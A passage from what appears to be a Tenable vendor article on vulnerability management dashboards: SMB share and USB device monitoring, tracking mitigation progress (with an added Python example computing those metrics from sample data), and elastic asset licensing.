    Another important aspect of vulnerability management is monitoring points where data can be accessed. The Data Access Vulnerabilities component provides you with a summary of known points where data can be exfiltrated. The Server Message Block (SMB) protocol provides the ability to share network drives, printers, and other connected devices out on the network. Having open SMB shares can enable anyone to gain access to confidential employee information, corporate trade secrets, and customer data. This information provides a starting point to identify systems where data could be at risk.

    Data Access Vulnerabilities component

    Managing sensitive information

    With my background in systems administration, I know that one of the most important aspects of the job is protecting corporate data. Reducing the number of entry/exit points where data could leak can help to reduce risk. The Potential Sensitive Information component provides another way to identify potential entry/exit points where data could be accessed. Indicators will turn red when one or more systems have detected the associated activity.

    Potential Sensitive Information component

    To obtain additional information, you can create a targeted scan to identify hosts reporting USB device activity. Using the USB Drives Enumeration plugin (24274), you can easily keep track of any USB devices that have been connected to Windows hosts. By customizing scans to run at specific times, you can capture activity during non-business hours, or over the weekend.

    Example using USB Drives Enumeration Plugin #24274

    This scan also provides a summary of SMB shares on Windows hosts. By default, Windows installs a set of hidden administrative shares on every system. Additional shares may be present on a host depending on the role of the system and the software installed. In the first example below, the scan found several hosts with the “Users” network share, which is known to the organization.

    SMB shares on Windows hosts

    Scans also found another host where multiple shares are enabled that are not part of any known network drive:

    SMB shares available, not part of a known network drive

    Every organization will have a different set of requirements with respect to network access and data sharing. Understanding the type of access your end users require to perform their duties is vital to understanding how to secure the file or data access points. Any misconfigurations on any shares within your environment can be exploited by attackers to gain access to critical systems or data. Using this information, you can implement additional security controls to mitigate these issues where needed.

    Tracking mitigation efforts

    Once the existing risk posture has been established, you can then begin to track mitigation efforts to see how well your organization is handling risk. These metrics will highlight whether current efforts are successful, or need to be improved.

    The first two columns within the Track Mitigation Progress component below include a count of mitigated and unmitigated (or current) vulnerabilities per severity. The Mitigated column includes vulnerabilities that are no longer detected by a rescan and are assumed to be remediated. The Unmitigated column displays the number of current vulnerabilities that have not been remediated. The Exploitable column shows the percentage of critical and high severity vulnerabilities that are known to be exploitable. The Patch Available column displays the percentage of unmitigated, exploitable vulnerabilities that have had a patch available for more than 30 days. The Exploitable Hosts column displays the number of hosts on the network that have unmitigated, exploitable vulnerabilities.

    Track Mitigation Progress component

    Results from this component clearly show that systems are not being patched on a continuous basis, because the numbers in the Unmitigated column are higher when compared to the Mitigated column. Organizations that are patching systems on a routine basis will see an increase in the mitigated column, and a decrease in the number of vulnerabilities across the rest of the columns. This matrix provides a great example to illustrate what your organization is doing to protect corporate assets and data, and where efforts need to be improved.
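    To make the column definitions above concrete, here is an added Python example (not Tenable.io code) that derives the same metrics from a constructed list of scan findings; the population used for each percentage is an assumption stated in the docstring, since the dashboard's exact rules are not given here.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

SEVERITIES = ("critical", "high", "medium", "low")
PATCH_AGE = timedelta(days=30)  # "patch available for more than 30 days"

@dataclass(frozen=True)
class Finding:
    """One vulnerability instance on one host, as a scanner reports it."""
    host: str
    plugin: str
    severity: str                    # one of SEVERITIES
    mitigated: bool                  # no longer detected by a rescan
    exploitable: bool                # a public exploit is known to exist
    patch_published: Optional[date]  # None when no vendor patch exists yet

def pct(num: int, den: int) -> float:
    """Percentage to one decimal; an empty population reports 0.0, not an error."""
    return round(100.0 * num / den, 1) if den else 0.0

def mitigation_matrix(findings: list, today: date) -> dict:
    """Track Mitigation Progress columns from raw findings. Assumed reading:
    Exploitable % is over all critical/high findings; Patch Available % and
    Exploitable Hosts count only unmitigated, exploitable findings."""
    per_severity = {s: {"mitigated": 0, "unmitigated": 0} for s in SEVERITIES}
    for f in findings:
        per_severity[f.severity]["mitigated" if f.mitigated else "unmitigated"] += 1
    crit_high = [f for f in findings if f.severity in ("critical", "high")]
    open_expl = [f for f in findings if f.exploitable and not f.mitigated]
    overdue = [f for f in open_expl
               if f.patch_published and today - f.patch_published > PATCH_AGE]
    return {
        "per_severity": per_severity,
        "exploitable_pct": pct(sum(f.exploitable for f in crit_high), len(crit_high)),
        "patch_available_pct": pct(len(overdue), len(open_expl)),
        "exploitable_hosts": len({f.host for f in open_expl}),
    }

# Constructed sample results (not real data): host, plugin, severity, mitigated, exploitable, patch date.
SAMPLE = [
    Finding("srv01", "A", "critical", False, True,  date(2016, 12, 1)),
    Finding("srv01", "B", "high",     False, False, date(2017, 1, 15)),
    Finding("srv02", "A", "critical", False, True,  date(2016, 12, 1)),
    Finding("srv02", "C", "medium",   True,  False, None),
    Finding("srv02", "D", "high",     False, True,  date(2017, 2, 20)),
    Finding("srv03", "E", "critical", True,  True,  date(2016, 11, 1)),
    Finding("srv04", "F", "low",      False, False, None),
    Finding("srv04", "G", "high",     False, True,  None),
]
```

    Calling `mitigation_matrix(SAMPLE, date(2017, 3, 1))` yields 2 unmitigated critical findings against 1 mitigated, which is the "not patched on a continuous basis" pattern the text describes.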

    Flexible licensing

    Because asset data can change constantly, Tenable created an Elastic Asset Licensing model

    The Tenable.io Vulnerability Management platform provides a clear and concise way to capture vulnerabilities on transient and dynamic assets. Because asset data can change constantly, Tenable created an Elastic Asset Licensing model that enables you to accurately license and track all your assets as they traverse the network. Tenable.io employs an advanced algorithm using specific attributes to track asset changes and vulnerabilities over time. This asset-based model will also allow you to recover licenses for temporary systems, and isolated assets that are scanned periodically.

    Try Tenable.io

    Tenable.io will provide you with accurate information on how well your organization is addressing security risks, and can help you track improvement efforts over time. If you are new to Tenable.io, you can try Tenable.io Vulnerability Management free for 60 days.
